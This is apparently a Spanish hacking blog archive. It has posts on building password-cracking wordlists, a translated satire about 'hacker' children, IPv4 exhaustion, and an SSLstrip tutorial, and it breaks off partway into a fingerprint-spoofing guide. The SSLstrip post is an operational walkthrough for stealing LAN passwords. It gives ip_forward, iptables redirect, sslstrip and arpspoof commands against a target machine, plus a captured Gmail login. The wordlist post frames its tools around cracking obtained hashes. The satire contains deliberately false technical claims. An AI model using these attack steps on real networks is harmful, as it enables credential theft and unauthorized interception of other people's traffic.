8.2.11

como obtener las mejores wordlists (diccionarios)

es muy comun en las auditorias de seguridad (y x supuesto en el hacking) el uso de wordlists (o diccionarios) para buscar claves debiles en un sistema. el procedimiento de crackeo de la clave es simple, se utiliza alguna herramienta, segun el caso, q vaya probando passwords hasta dar con la correcta.

en el caso de claves online la historia es mas complicada ya que se utilizan sistemas para blockear al atacante cada X numero de intentos. en los servidores q administro x ej suelo instalar fail2ban q hace muy bien el trabajo, se puede configurar numero de intentos, tiempo del ban, envio de correo con el log y whois del ataque, etc.

la idea entonces es hacerse con la clave encriptada (hash) para despues crackearla tranquilo en la comodidad de nuestros hogares. la manera de obtener el hash tanto como el proceso de crackeo es algo a lo q no me voy a referir ya que esta entrada es sobre otro tema (y depende del caso especifico), pero se supone q si estan buscando wordlists ya saben para q las quieren y tendran su john the ripper (o el q sea) preparado.


tipos de crackeo

hay varios formas de intentar crackear 1 hash pero el tiempo depende de varios factores, la velocidad de procesamiento del sistema es muy importante pero tambien el tipo de encriptacion q tiene el hash, al aumentar la complejidad del algoritmo obviamente aumenta el tiempo del proceso.

se puede ver mucho x ahi gente pidiendo "wordlists para ataque de fuerza bruta", eso es en realidad un error de concepto, no xq no se pueda hacer sino porque son 2 cosas distintas. 1 ataque x fuerza bruta es el que va probando todas las combinaciones hasta dar con la correcta, dentro de esta posibilidad tenemos q fijarnos en los tipos de caracteres q puede incluir la password (mayusculas, minusculas, signos de puntuacion y numeros). supongamos q simplemente buscaramos letras minusculas el sistema iria probando todo el abecedario y luego:

aa
ab
ac... hasta az y despues:

ba
bb
bc...

y asi sucesivamente hasta completar los campos q le hayamos indicado, si fueran 8 llegaria hasta "zzzzzzzz".

esto obviamente lleva muchisimo tiempo, dependiendo de la extension de la password y la complejidad del algoritmo tal vez... para siempre... je

pero como somos seres humanos y a la mayoria le cuesta recordar secuencias de caracteres sin sentido, un gran porcentaje de los usuarios utiliza passwords que son simples palabras q se pueden encontrar en 1 diccionario. en este punto es donde entran en juego las wordlists. seguramente no van a crackear la pass del server de la nasa con 1 wordlist pero para cuentas de users normales suelen funcionar bastante bien si se usa la correcta.

con el diccionario solamente probamos las palabras q se encuentran en el, sin perder tiempo en secuencias sin sentido y ahorrando de esta forma muchisimo tiempo de proceso. el tema es q la palabra este en la lista, sino x supuesto q no vamos a obtener ningun resultado.


creando wordlists

la mejor opcion entonces es crear nuestra propia wordlist basados en las necesidades de cada caso. es importante la ingenieria social, investigar al objetivo para tener 1 idea de lo q puede poner como pass, usar nombres de productos si se trata de 1 empresa q fabrica algo, constelaciones si son astronomos, drogas si son quimicos, nombres de equipos y jugadores si esta relacionado con algun deporte, etc.

los otros dias necesitaba una lista especifica, nombres permitidos en argentina... en la red se pueden encontrar muchas wordlists especificas y generales en todos los idiomas (la mayoria en ingles), pero es imposible encontrar algo tan especifico como lo q buscaba asi q no me quedo otra q hacermela yo mismo.

la informacion se encuentra facilmente en google (en el reg civil x ej) pero no en forma de lista, y copiar y pegar es practicamente imposible. me disponia a usar metodos prehistoricos con wget y algun script para manipular los datos, cuando me encontre con 1 interesante utilidad q automatiza el trabajo.

voy a explicar los 2 metodos, xq aunque al final termine usando el viejo y fiel wget me gusto el programita. se llama:


CeWL (se pronuncia cool)

se puede descargar de aca:

http://www.digininja.org/files/cewl_3.0.tar.bz2

y la pagina con instrucciones (en ingles) aca:

http://www.digininja.org/projects/cewl.php

basicamente hay q tener instalado ruby y las siguientes gems:

hpricot
http_configuration
mime-types
mini_exiftool
rubyzip
spider

se instalan con:

gem install nombredelgem

y hay q setear la variable RUBYOPT con el valor rubygems:

export RUBYOPT=rubygems

no esta en las instrucciones pero tuve q intalar tambien la libreria "libimage-exiftool-perl", xq me daba un error. para otros errores fijense en la pagina. el help de cewl devuelve:

$ ./cewl.rb --help
cewl 3.0 Robin Wood (dninja@gmail.com) (www.digininja.org)

Usage: cewl [OPTION] ... URL
--help, -h: show help
--depth x, -d x: depth to spider to, default 2
--min_word_length, -m: minimum word length, default 3
--offsite, -o: let the spider visit other sites
--write, -w file: write the output to the file
--ua, -u user-agent: useragent to send
--no-words, -n: don't output the wordlist
--meta, -a file: include meta data, optional output file
--email, -e file: include email addresses, optional output file
--meta-temp-dir directory: the temporary directory used by exiftool when parsing files, default /tmp
-v: verbose

URL: The site to spider.

el uso es bastante simple supongamos q queremos descargar el contenido de "www.yahoo.com" en el archivo "lista", pondriamos:

./cewl.rb -w lista www.yahoo.com

con el resto de las opciones se pueden hacer cosas bastante interesantes como setear un minimo de caracteres, la cantidad de links, etc... cosa de experimentar 1 poco...


con el viejo wget ;)

con wget y 1 sencillo script a medida podemos obtener los mismos resultados, como el script depende de lo q quieran hacer solamente voy a nombrar los comandos de manipulacion para q cada uno los use como quiera.

para descargar la pagina con wget:

wget -r -l 1 -nd paginaadescargar

"-r" descarga recursivamente la pagina, "-l" especifica el nivel de profundidad y "-nd" q no se creen los directorios. con esto obtenemos los archivos q componen la pagina, seleccionamos lo q nos interesa y procedemos a extraer el contenido y ordenarlo 1 poco, para eso vamos a usar wyd q es 1 script en perl q se puede descargar desde aca:

http://www.remote-exploit.org/wp-content/uploads/2010/01/wyd-0.2.tar.gz

simplemente lo descomprimimos y lo ejecutamos. el help:

$ ./wyd.pl --help

*
* ./wyd.pl 0.2 by Max Moser and Martin J. Muench
*

Unknown option: help
Usage: ./wyd.pl [OPTIONS]

Options:

-o = Write wordlist to
-t = Separate wordlist files by type, e.g. '.doc'
-s = Use 'strings' for unsupported files
-b = Disable removal of non-alpha chars at beginning of word
-e = Disable removal of non-alpha chars at end of word
-f = Disable inclusion of filenames in wordlist
-v = Show debug / verbose output
-n = Continue even if programs / modules are missing

suponiendo q tenemos el contenido q descargamos en el directorio download/ tendriamos q ingresar:

./wyd.pl -n -o nombredelarchivoagenerar.txt download/

con esto ya tenemos una lista con todas las palabras q estaban en las paginas q descargamos, solo hay q limpiarla y ordenarla 1 poco, para esto nos sobra con los comandos de manejo de cadenas q trae bash. vamos a ver lo mas basico....


ordenando las listas

empecemos x ordenar alfabeticamente:

sort -d lista > listaordenada

borrar entradas repetidas:

uniq listaordenada > listaunica

ya tenemos una lista ordenada alfabeticamente y sin palabras repetidas ("listaunica"). muchas veces aparece el problema de palabras q quedan con algun caracter pegado al principio o al final o cadenas q queremos remover xq contienen algun caracter raro o lo q sea, para eso usamos sed (StreamEDitor)... el help de sed:

$sed --help
Usage: sed [OPTION]... {script-only-if-no-other-script} [input-file]...

-n, --quiet, --silent
suppress automatic printing of pattern space
-e script, --expression=script
add the script to the commands to be executed
-f script-file, --file=script-file
add the contents of script-file to the commands to be executed
-i[SUFFIX], --in-place[=SUFFIX]
edit files in place (makes backup if extension supplied)
-l N, --line-length=N
specify the desired line-wrap length for the `l' command
--posix
disable all GNU extensions.
-r, --regexp-extended
use extended regular expressions in the script.
-s, --separate
consider files as separate rather than as a single continuous
long stream.
-u, --unbuffered
load minimal amounts of data from the input files and flush
the output buffers more often
--help display this help and exit
--version output version information and exit

If no -e, --expression, -f, or --file option is given, then the first
non-option argument is taken as the sed script to interpret. All
remaining arguments are names of input files; if no input files are
specified, then the standard input is read.

E-mail bug reports to: bonzini@gnu.org .
Be sure to include the word ``sed'' somewhere in the ``Subject:'' field.

esto es 1 poco mas dificil de manejar pero se deja... para remover un caracter al principio de la palabra:

sed 's/^[caracter]//' -i lista.txt

al final:

sed 's/[caracter]$//' -i lista.txt

para borrar lineas conteniendo X caracter:

sed '/caracter/d' -i lista.txt

y asi podemos hacer infinidad de cosas con nuestras cadenas, si x ejemplo queremos extraer las palabras q empiecen con la letra "m" y continuen con cualquier caracter entre la "d" y la "j" usamos grep con el modificador "-w":

grep -w 'm[d-j]*' .txt

todo esto lo podemos combinar en 1 sola linea:

./wyd.pl -n pages | grep -w 'm[d-j]*' | sort -d | uniq > lista.txt

o si son muchas algun script q simplifique para no tener q andar cambiando variables todo el tiempo en la consola.

solamente queda cargarlas en su programa de cracking favorito y probarlas...

10.1.11

como saber si su hijo es un hacker.

me tome el trabajo de hacer 1 traduccion literal de este texto ya q las q andan x ahi son versiones adaptadas al publico español y la verdad q se pierde bastante en muchos puntos, ademas de inventar algunos y olvidarse otros tantos.

el original fue publicado en diciembre de 2001 x T. Reginald Gibbons aca:

Is Your Son a Computer Hacker?



su hijo es 1 hacker informatico?

como padre moderno e informado, trato de estar tan envuelto como me es posible en las vidas de mis seis hijos. los aliento a unirse a equipos deportivos. mantengo un ojo paternal en los CDs q escuchan y los shows que van a ver, la editora a la que pertenecen los libros q leen. Se podria decir que soy 1 padre modelo. mis hijos nunca han dejado de hacerme sentir orgulloso, y puedo decir sin ninguna duda q tengo la mejor flia en USA.

hace 2 años, mi esposa carol y yo decidimos q la educacion de nuestros hijos no estaria completa sin alguna preparacion basica en computadoras modernas. con este fin, les compramos una nueva compaq con la q aprender. los niños se divirtieron mucho usando los programas de aplicacion q compramos, como adobe photoshop y microsoft's word, y mi esposa y yo nos vimos complacidos de q nuestro regalo fuera tan bien recibido. nuestro hijo peter fue el mas absorvido x el dispositivo, y se volvio casi un profesional surfeando la red. cuando peter comenzo a pasar dias enteros en la maquina, me preocupe, pero carol me recomendo q me calmara, q solo era una fase pasajera. Confie es sus instintos maternales, hasta q nuestra hija menor, cindy, entro al living 1 noche gritando: "PETER ES 1 HACKER!"

como podran imaginar, estaba sorprendido. 1 hacker en mi propia casa! comence a monitorear los habitos de mi hijo, para estar seguro de q cindy no estuviera simplemente inventando historias, como es propensa a hacer algunas veces.

despues de unos pocos dias de investigacion, y algo de estudio en hacking, confronte a peter con la evidencia. temo decir, q esta fue la unica vez q estuve realmente decepcionado de 1 de mis hijos. Los criamos para ser honestos y tener integridad, y peter traiciono los principios q tratamos de inculcarle, cuando se rehuso a admitir sus actividades. Sus negaciones continuaron x horas, y al final, no me quedo otra opcion q prohibirle usar la computadora hasta ser lo suficientemente grande para ser responsable x sus actos.

despues de atravesar esta prueba con mi propia familia, estuve pensando la mejor manera de ayudar a otros en situacion similar. obtuve un monton de conocimiento sobre hackers en esos pocos dias. es justo que provea de esa informacion a otros padres, con la esperanza de q ellos puedan saber si sus hijos estan metidos dentro del mundo del hacking. tal vez otros padres puedan dirigir a sus hijos de regreso x el camino recto antes q medidas extremas deban ser empleadas.

con este fin, decidi publicar el top ten de las señales de que su hijo es 1 hacker. recomiendo a todos los padres leer esta lista cuidadosamente y si su hijo coincide con el perfil, deben tomar alguna accion. 1 padre inteligente tratara primero de razonar con su hijo, antes de recurrir a castigos o hasta palizas. Me enorgullezco de nunca golpear a 1 niño, y espero q esta guia ayude a otros padres a detener la mala conducta de sus hijos antes q 1 paliza se vuelva necesaria.


1. le ha pedido se hijo cambiar de ISP?

la mayoria de las familias americanas usa proveedores de internet responsables y de confianza, como AOL. estos proveedores tienen estrictas politicas de "no hacking", y toman cuidadosas medidas para asegurarse de q tenga 1 agradable experiencia en internet, educativa y sobre todo legal. si su hijo esta convirtiendose en hacker, 1 de sus primeros pasos sera pedir el cambio a algun proveedor mas "amigable" con los hackers.

recomiendo a todos los padres q se nieguen a este pedido. 1 de las razones x la q su hijo esta interesado en cambiar de proveedor es para deshacerse del filtro de proteccion infantil de AOL. este filtro es vital para cualquier padre q desee q su hijo disfrute de internet sin ponerlo en peligro de la exposicion a contenido "adulto". es mejor poner la proteccion q AOL provee, en lugar de usar alguna solucion hogareña. si su hijo se esta convirtiendo en hacker, sera capaz de evitar cualquier medida "hogareña" con sorprendente facilidad, usando informacion obtenida de varios sitios hacker.

2. encuentra programas en su computadora q no recuerda haber instalado?

su hijo probablemente intentara instalar algun software de hackers. tratara de ocultar su presencia de alguna manera, pero ud puede normalmente encontrar todos los nuevos programas viendo la lista de programas en "agregar y quitar programas" en su panel de control. Algunos programas hacker populares son "Comet Cursor", "Bonzi Buddy" y "Flash".

la mejor opcion es confrontar a su hijo con la evidencia, y forzarlo a remover los programas ofensivos. probablemente intentara instalar el software nuevamente, pero ud sera capaz de saber cuando esto suceda, si su maquina le ofrece "descargar" alguna de las aplicaciones hacker. si esto sucede, es tiempo de tener una severa charla con su hijo, y posiblemente considerar algun castigo.

3. su hijo le ha pedido nuevo hardware?

los hackers informaticos se ven frecuentemente limitados x el hardware convencional. ellos pediran placas de video "mas rapidas", y discos rigidos con mayor capacidad, o hasta mas memoria. pero si su hijo comienza a pedirle estos dispositivos, es posible q tenga 1 necesidad legitima. lo mejor q puede hacer es comprar hardware confiable y legal haciendolo solo al fabricante de su computadora.

si su hijo le pide 1 nuevo procesador de una compañia llamada "AMD", es 1 genuina causa de alarma. AMD es 1 empresa del 3er mundo que hace copias inferiores de chips de procesadores americanos. usan mano de obra de niños en sus talleres tercermundistas, y deliberadamente desactivan caracteristicas de seguridad q los fabricantes de procesadores americanos, como intel, usan para prevenir el hacking. los chips AMD nunca son vendidos en tiendas, y seguramente se le pedira q lo ordene a traves de sitios de internet. no compre este chip! este es 1 pedido q debe rehusar a su hijo, si tiene alguna esperanza de criarlo bien.

4. su hijo lee manuales de hacking?

si presta bastante atencion a los habitos de lectura de su hijo, como yo hago, sera capaz de determinar la mayor parte de sus opiniones y hobbies. los niños son mas impresionables en su adolescencia. cualquier padre q haya sufrido el intento de su hija de 17 años de escabullirse a 1 cita, perfumada y maquillada, es consciente del efecto q las influencias impropias pueden causar en mentes inexperimentadas.

hay, infortunadamente, muchos manuales de hacking disponibles en las librerias hoy dia. unos pocos titulos para tener bajo mirada son: "snow crash" y "cryptonomicon" de neal stephenson, "neuromancer" de william gibson, "programming with perl" de timothy o'reilly, "geeks" de jon katz, "the hacker crackdown" de bruce sterling, "microserfs" de douglas coupland, "hackers" de steven levy, y "the cathedral and the bazaar" de eric s. raymond.

si encuentra alguno de estos manuales de hacking en posesion de sus hijos, confisquelos inmediatamente. puede ademas pedir a los proveedores locales de libros q remuevan estos titulos de sus estanterias. puede encontrarse con alguna resistencia al principio, pero hasta los vendedores de libros deben someterse a las presiones de la comunidad.

5. cuanto tiempo x dia pasa su hijo usando la computadora?

si su hijo pasa mas de 30 minutos x dia en la computadora, puede estar usando DOS contra paginas de otras personas. DOSear implica ganar acceso al "command prompt" (la consola) de otras maquinas, y usarlas para blockear servicios vitales de internet. esto puede tomar mas de 8 horas. si su hijo esta haciendo esto, esta rompiendo la ley, y debe detenerlo inmediatamente. la politica mas segura es limitar el acceso de sus hijos a la computadora a 1 maximo de 45 minutos x dia.

6. su hijo juega quake?

quake es 1 realidad virtual online usada por los hackers. es 1 lugar popular para encontrarse y entrenarse, donde ellos discuten sobre hacking y se entrenan en el uso de numerosas armas de fuego. muchos hackers desarrollan tendencias antisociales debido al uso de este mundo virtual, y pueden sufrir comportamiento erratico en el hogar o la escuela.

si su hijo usa quake, debe hacerle entender q esto no es aceptable para ud. debe asegurarse q todas las armas de fuego en su casa esten bien guardadas, y tener los seguros de gatillo activados. tambien debe preocuparse x la atencion en la escuela.

7. su hijo se esta volviendo discutidor y hosco?

a medida q los adolescentes ingresan al electronico mundo del hacking, comienzan a desconectarse del mundo real. pierden la habilidad de controlar sus actos, o juzgar lo bueno o malo de un comportamiento. esto se manifestara pronto en la forma q trata a los demas. aquello con lo que disienta lo hara con desprecio, amargura y hasta lenguaje vulgar. proferira amenazas de violencia de naturaleza real o electronica.

aun cuando sea confrontado, probablemente su hijo encuentre dificultad para hablar sobre este problema con ud. probablemente dira q no hay problema, y q esta imaginando cosas. le dira q es ud quien tiene el problema, y q debe "dejarlo solo" y "dejar de molestarlo". no se deje engañar. ud es la unica chance q tiene su hijo, aun si no entiende la situacion en la q esta. siga intentando llegar a el, no importa cuanto se refugie en si mismo.

8. esta su hijo obsesionado con "Lunix"?

BSD, Lunix, Debian y Mandrake son todas versiones de un sistema de operacion ilegal hacker, inventado por un hacker sovietico llamado linyos torovoltos, despues q los rusos perdieran la guerra fria. esta basado en 1 programa llamado "xenix", q fue escrito x microsoft para el gobierno de usa. estos programas son usados x hackers para entrar en las computadoras de otras personas y robar numeros de tarjetas de credito. ademas puede ser usado para entrar en los stereos ajenos para robar su musica, usando el programa "mp3". torovoltos es 1 conocido hacker, responsable de escribir muchos programas hacker, como "telnet", q es usado por los hackers para conectar a otras maquinas en internet sin usar el telefono.

su hijo puede intentar instalar "lunix" en su disco rigido. si el es cuidadoso, ud no notara su presencia, sin embargo, lunix es 1 bestia caprichosa, y si lo maneja incorrectamente, su hijo puede dañar su computadora, y hasta romperla completamente borrando windows, a este punto su computadora debera ser reparada x 1 profesional.

si ud ve la palabra "LILO" durante el arranque de windows (justo despues d encender la maquina), su hijo ha instalado lunix. para deshacerse de el, debe enviar su computadora de vuelta al fabricante, y hacer q le instalen 1 nuevo disco duro. lunix es 1 software extremadamente peligroso, y no puede ser removido sin destruir parte de la superficie de su disco.

9. ha cambiado su hijo su apariencia radicalmente?

si su hijo ha sido objeto de 1 repentino cambio en su estilo de vestir, ud puede tener 1 hacker en sus manos. los hackers tienden a vestirse con colores vivos, fluo. pueden vestir pantalones baggy, remeras con colores brillantes y pelo en punta con colores vivos para hacer juego con sus ropas. pueden llevar glow sticks y algunos llevan chupetes colgando de su cuello. (no tengo idea xq hacen esto). hay muchos de estos hackers en las escuelas hoy en dia, y su hijo puede estar comenzando a asociarse con ellos. si ud nota q el grupo de amigos de su hijo incluye gente vestida de tal manera, es hora de pensar en 1 severo toque de queda, para protegerlo de peligrosas influencias.

10. esta su hijo teniendo dificultades en la escuela?

si su hijo se lleva materias en la escuela, o tiene notas bajas en deportes, puede estar involucrado en algun grupo de hacking, tal como la infame asociacion hacker "otaku". excesivo tiempo desperdiciado en la computadora, comunicandose con sus amigos hackers puede causar daño temporal a los ojos y el cerebro, a causa de la radiacion electromagnetica. esto causara q sus notas desciendan dramaticamente, particularmente en asignaturas dificiles como matematicas y quimica. en casos extremos, la sobreexposicion a la radiacion de la computadora puede causar esquizofrenia, meningitis y otras enfermedades psicologicas. ademas, la reduccion de ejercicio puede causar que pierda masa muscular, y hasta empezar a ganar peso. por el bien de la salud psiquica y mental de su hijo, debe ponerle 1 alto a su hacking, y limitar el tiempo q pasa con la computadora drasticamente.



aliento a todos los padres a leer esta guia cuidadosamente. el futuro de sus hijos depende de esto. el hacking es 1 actividad ilegal y peligrosa, q puede enviar a su hijo a la carcel, y destrozar su familia. esto no debe tomarse demasiado en serio.

5.12.10

ARPAgeddon IPcalipsis o como lo quieran llamar. Se acaba el espacio en Internet?



hace rato q se habla de este tema pero siempre parecio q nunca llegaria el dia o q alguien iba a hacer algo antes de que llegara, lo cierto es que ya no quedan muchas direcciones para asignar, a este ritmo es cuestion de dias para q se acaben. en el contador de la izquierda se puede ver al ritmo q bajan y lo poco q queda disponible...

por supuesto la mayoria de los "mortales" no entiende mucho cual es el problema o si en realidad hay un problema o es otra estupidez como el y2k.



pero no, esto va a tener consecuencias... buenas y/o malas...


que es una IP?

la sigla IP (Internet Protocol) se refiere al protocolo de comunicacion principal usado en internet. para q esto funcione cada maquina (o dispositivo) debe tener una direccion (direccion IP) que es unica dentro de la red, no puede haber 2 IPs iguales ya que esto genera un error inmediatamente. digamos q es como la direccion de nuestra casa, o el numero de documento de identidad o como se llame la identificacion q usen en su pais... un numero unico.

la version q usamos desde hace casi 30 años es IPv4, en la cual este numero tiene una longitud de 32 bits, dividido en 4 segmentos de 8 bits. en decimal una tipica IP puede ser:

200.43.65.23

cada uno de los campos lo comprende un numero entre 0 y 255 o sea q la cuenta es facil 256^4 (o 2^32 binario) lo cual nos da un total de 4.294.967.296 IPs posibles. a esto le tenemos q restar unos 18 millones reservados para redes privadas y otros 270 millones para multicast.


quien asigna y quien reparte las IPs

a nosotros (el usuario final) nos da la IP nuestro proveedor de internet q tiene un numero limitado de ellas, cuando se le acaban y necesita mas las pide al RIR (Regional Internet Registrie) q le corresponde, en nuestra region esta LACNIC q cubre latinoamerica y el caribe. Existen otros 4 que son ARIN (norteamerica), AfriNIC (africa), APNIC (asia y pacifico), RIPE NCC (europa, medio este y asia central).


cuando estos necesitan mas IPs se las piden al IANA (Internet Assigned Numbers Authority), al cual le quedan las q vemos en el contador... teniendo en cuenta q la demanda actual es de unos 200 millones al año parece q estamos en 1 problema... je

de todas formas se calcula q los RIRs y los ISPs (Internet Service Provider) tienen mas de 400 millones guardadas... lo cual nos da unos 2 años mas hasta que se acaben de verdad.


celulares, 3g, 4g y toda esa porqueria

gran culpa de todo esto la tienen la gran cantidad de porquerias q ahora conectan a internet sin mucho sentido, tenemos millones de celulares, ipads y otros engendros conectando para actualizar perfiles de facebook, dejar comentarios estupidos en twitter, estar al tanto de la temperatura o ver videitos en youtube.

no seria mejor haberse planteado la real necesidad de darle una IP publica a cada uno antes de saturar todo? para q m... quiere una IP unica un telefono movil? alguien necesitaba correr un server de correo o un FTP desde el celu?

bastante mal uso hacen ya de las IPs con las conexiones hogareñas... estabamos tan tranquilos hace solo 10 años... en fin... todo sea x el "progreso" de la red...


la solucion... IPv6

IPv6 es la nueva version del Internet Protocol diseñada para usar direcciones de 128 bits en lugar de 32 lo cual nos da un limite de 2^128 o sea:

340.282.366.920.938.463.463.374.607.431.768.211.456

las direcciones IPv6 estan compuestas, a diferencia de las v4, por 8 campos de 16 bits cada uno, el numero maximo seria:

FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF (el decimal de arriba)

de estos los 1eros 64 corresponden al prefijo de red y los ultimos al identificador de la interfaz q se genera a partir de la MAC address del dispositivo conectado.

los sistemas operativos ya tienen soporte para el nuevo protocolo hace años, el tema es q la mayoria del hardware de redes de alto nivel debe ser cambiado, incluyendo tambien la mayoria de los switches hogareños. ademas de q la transicion no se puede hacer de un dia para el otro, estamos hablando de un par de años como para hacerlo de manera q no cause demasiados transtornos, habra un largo periodo en el cual conviviran ambos protocolos hasta que el 4 vaya desapareciendo poco a poco... pero deberiamos empezar ya...


especulacion?

q pasaria en 1 escenario donde no haya mas IPs? hay muchos ISPs chicos q ya usan NAT (Network Address Translation) para sacar montones de usuarios con una misma IP, como decia al principio para la mayoria de los "mortales" esto es lo mismo... hasta q quieren bajar alguna pelicula desde una pagina de descargas y les sale el tipico:

Your IP address xx.xx.xx.xx is already downloading a file. Please wait until the download is completed.

o:

Su dirección IP xx.xx.xx.xx se encuentra descargando xxxxx bytes del archivo XX. Por favor finalice esta descarga antes de iniciar otra.


o alguna parecida... esta lleno en los foros de usuarios preguntando porque les sale ese error o no pueden correr servers de juegos... o algun newbie practicando con troyanos de conexion inversa q no puede forwardear puertos. ahi tienen la respuesta, estan todos en una gran LAN (Local Area Network) barrial...

ademas, por mas q nos acostumbremos a esto y quieran explotarlo al maximo el NAT tambien tiene limite. 1 IP puede usar un maximo de 65536 (FFFFh) puertos, o sea q puede abrir ese numero de conexiones, si se superan quedan encoladas hasta q se libere alguna.

ni hablar del q quiera tener un simple FTP, o algo tan normal hoy en dia como una conexion a la pc de tu casa (hace años q no podria vivir sin ella),  pagar una ip publica va a ser como pagar ahora una conexion dedicada.

se dice q tanto los grandes operadores de usa como las organizaciones gubernamentales ya estan listas para empezar el proceso, google y facebook parecen estar tambien en el camino y en europa y asia hay algunos equipos q ya empezaron a ejecutarlo.

en latinoamerica tambien tenemos algunas redes trabajando en v6 aunque al usuario final llegan en v4. aca la lista de quienes lo tienen implementado o estan en eso a dia de hoy:


conclusion

no se... q estamos esperando? a cuanto va el contador mientras leen esto? ya llego a 0?

25.11.10

SSLSTRIP - Como conseguir cualquier password sin despertar sospechas en 1 lan.


esta tecnica fue presentada en el black hat dc 2009 por moxie marlinspike y desperto bastante revuelo, no era nuevo como ataque pero si la herramienta que lo automatiza y lo hace mucho mas facil.

pero esto es del año pasado! diran... y encima pongo q es mas viejo, como es posible entonces q siga funcionando y nadie lo parchee. muy facil, no es 1 ataque directo al ssl sino que lo q hace es reemplazar todos los links https x http seguido de 1 ataque mitm como el q vimos en este link:


de esta manera el objetivo se comunica con nosotros x http y nosotros con el servidor de destino x https, obteniendo en el proceso todas las passwords en texto plano q despues enviamos encriptadas a su destino final.

con esto salvamos el problema de certificados q tenemos usando ettercap como habiamos visto aca:


haciendo transparente el logueo para el objetivo... peligroso no?...


preparando el sistema

voy a explicarlo para debian/ubuntu, si tienen fedora o derivados cambien x yum. 1ero instalamos python y python-twisted-web:

apt-get install python python-twisted-web

despues descargamos sslstrip, pueden buscar algun link o bajarlo de la pagina del autor:

http://www.thoughtcrime.org/software/sslstrip/

podemos hacer 2 cosas, instalarlo o correrlo desde el directorio de descarga. para instalarlo:

python ./setup.py install

de esta manera queda accesible desde la consola, sino para ejecutarlo:

python sslstrip.py (opciones)


el ataque

lo 1ero es activar el reenvio de paquetes, esto lo hacemos cambiando de 0 a 1 el valor del archivo ip_forward q se encuentra en /proc/sys/net/ipv4/, editandolo o simplemente poniendo en la consola:

echo "1" > /proc/sys/net/ipv4/ip_forward

despues configuramos iptables para q reenvie el trafico a ssltrip, el puerto q queremos redirigir es el 80 hacia el 10000 q es el default del programa. si quieren usar otro puerto x alguna razon este es el momento de elegirlo, despues al lanzarlo se puede cambiar. el comando seria:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 (o el q quieran)

ahora corremos sslstrip, si lo instalaron simplemente:

sslstrip -w nombrearchivo

donde "nombrearchivo" es 1 nombre para el archivo donde van a quedar logueados los datos. si cambiamos el puerto usamos el modificador -l:

sslstrip -w nombredearchivo -l numdepuerto

si todo esta bien instalado deberiamos ver esto:

sslstrip 0.6 by Moxie Marlinspike running...

ahora solo falta hacer el envenenamiento arp para q la otra maquina nos mande su trafico, podemos usar exactamente el mismo metodo de la entrada q cite antes y el resultado simplemente seria q el objetivo no tendria el famoso mensaje del certificado ya que el trafico pasaria x el puerto 80, el user/pass saldria en la pantalla inferior como cualquier pass de texto plano y a su vez se puede ver en el log de ssltrip:

2010-11-25 19:48:39,529 SECURE POST Data (www.google.com):
ltmpl=default&ltmplcache=2&continue=http%3A%2F%2Fmail.google.com%2Fmail%
2F%3F&service=mail&rm=false&dsh=3151454474180978812&ltmpl=default&hl=en
&ltmpl=default&scc=1&ss=1&timeStmp=&secTok=&GALX=HirBaqYb1RQ&Email=
ACA_SALE_EL_CORREO&Passwd=ACA_LA_PASSWORD&rmShown=1&signIn
=Sign+in&asts=

pero podemos hacerlo mas facil para no tener q usar ettercap simplemente instalando la suite dsniff:

apt-get install dsniff

dsniff daria como para otra entrada completa pero ahora vamos a usar solamente arpspoof para hacer el envenenamiento. despues de instalar dsniff ponemos en la consola:

arpspoof -i interface (eth0, wlan0, ath0 o la q sea) -t target (maquina objetivo) gateway (el router)

x ej:

arpspoof -i eth0 -t 192.168.1.10 192.168.1.1

en la consola veriamos algo como esto repetirse una y otra vez:

0:5:4e:4d:15:30 0:1e:e5:fc:10:65 0806 42: arp reply 192.168.1.1 is-at 0:5:4e:4d:15:30

0:5:4e:4d:15:30 es nuestra mac, q queremos q el objetivo (0:1e:e5:fc:10:65) crea q es el router, entonces lo q le decimos es q 192.168.1.1 (el router) esta en (is-at) nuestra mac (0:5:4e:4d:15:30)

si hacemos en el objetivo 1 arp -a vamos a ver que nuestra ip y el router tienen la misma mac, el envenenamiento tuvo exito.

sslstrip ya esta capturando trafico ssl y guardandolo en el log, solo hay q abrirlo y ver q hay...



14.7.10

Como vulnerar un sistema de Biometria - Huellas dactilares - by Alesteir


este tutorial fue escrito x mi amigo Alesteir hace unos 2 años en 1 momento muy especial, en 1 foro q en su nombre lleva la palabra "hacker" pero ya no queda practicamente ninguno, si quedo mucho warez, porno y algo d offtopic.

los otros dias encontre este texto en 1 foro "administrado" x alguien q c negaba a este tipo d temas (sera xq no sabe ni usar 1 proxy xD) y ni siquiera c ponia la fuente.

no lo encontre completo (y con su fuente correspondiente) en ningun otro lado d la red y me parecio justo q tenga su lugar con el nombre d su autor bien claro.


Burlando Biometria By Alesteir

A Continuación os enseñare un método a seguir para falsear huellas dactilares o digitales (como le llaman algunos), lo cual es un método mas para vulnerar cualquier sistema basado en seguridad biométrica de huellas digitales y por ende es de aplicación neta al hacking y a los sistemas informáticos. Para poder falsificar cualquier huella necesitamos encontrar la original primero (es aca donde se puede recurrir a la ingeniería social para conseguir la huella deseada , jejejeje), además de que es necesario poder tener una buena impresión.

Es aquí donde entra el rollo de la ciencia forense. Hay que entender que las huellas estan compuestas por crestas papilares, son estas crestas -las elevaciones- y surcos (las grietas), las que le dan esa característica única a cda huella, ya que ninguna huella es igual a otra, asi sean de la misma persona, y son los distintos recovecos y formas de estos elementos, los que las hacen únicas e irrepetibles, y para hacer dictamenes se necesitan una cantidad determinada de puntos característicos coincidentes para poder dar un correcto resultado, la clasificación de estos puntos, su topografia, añadidas a otras cuestiones tecnicas son las que forman las bases de la dactiloscopia como ciencia, es por eso que se han usado y se siguen usando las huellas digitales como un método de identificación personal, es sabido que recientemente se usan en cuestiones de biometría, aplicadas a la seguridad en general), hay que tener en cuenta que es la presión ejercida (al tener contacto con superficies de distinto tipo tales como: espejos, vasos y envases, picaportes, vidrios, acetatos, pantallas de pcs y muchos objetos mas), la que determina de que una huella se imprima en una superficie, es cierto que existen otros factores mas que influyen a que una impresión sea buena o no (el polvo es una de ellas), y este es uno de los items determinantes a la hora de hacer una recolección de huellas dactilares (ojo, que las partes lisas -por lógica- son los focos mas frecuentes para encontrar buenas huellas (para clasificar una huella como buena debe verse tan siquiera un 75 % de la misma, aunque también se pueden hacer reconstrucciones a partir de fragmentos) , nunca encontraríamos una huella en una superficie rugosa y con porosidades, ya que no se tendría el suficiente contacto por parte de las crestas de la huella con la superficie. En unas imágenes que se ven mas abajo, se ve una buena impresión dactilar(después de revelada lógicamente), por lo tanto nos valdremos de objetos y elementos caseros, pero que serán efectivos a la hora de hacer una recolección, 